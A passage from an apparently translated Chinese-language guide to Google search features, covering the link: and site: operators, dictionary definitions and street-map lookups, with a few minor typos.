有些单词如果带有冒号就会有特殊的意思。比如 link ：操作员。查询 link:siteURL ，就会显示所有指向那个 URL 的网页。举例来说，链接 www.Google.com 会向你显示所有指向 GOOGLE 主页的网页。但这种方法不能与关键字查询联合使用。

5 、查找站点
单词 site 后面如果接上冒号就能够将你的搜索限定到某个网站。具体做法是：在 c 搜索栏中使用 site:sampledomain.com 这个语法结构。比如，在斯坦福找申请信息，输入：
admission site:www.stanford.edu

6 、查找字典释意
查找字典释意的方法是在搜索栏中输入你要查询的内容。在我们根据要求找到所有的字典释意都会标有下划线，位于搜索结果的上面，点击链接你会找到字典提供者根据要求给出的相关定义。 7 、用 GOOLGE 查找地图
想用 Google 查找街区地图，在 Google 搜索栏中输入美国街区地址，包括邮递区号或城市 / 州（比如 165 大学大街 PALO ALTO CA ）。通常情况下，街区地址和城市的名字就足够了。
当 Google 识别你的要求是查找地图，它会反馈给你有高质量地图提供者提供的链接，使你直接找到相关地图。我们是以质量为基础选择这些地图提供者。值得注意的是 Google 和使用的地图信息提供者没有任何关联。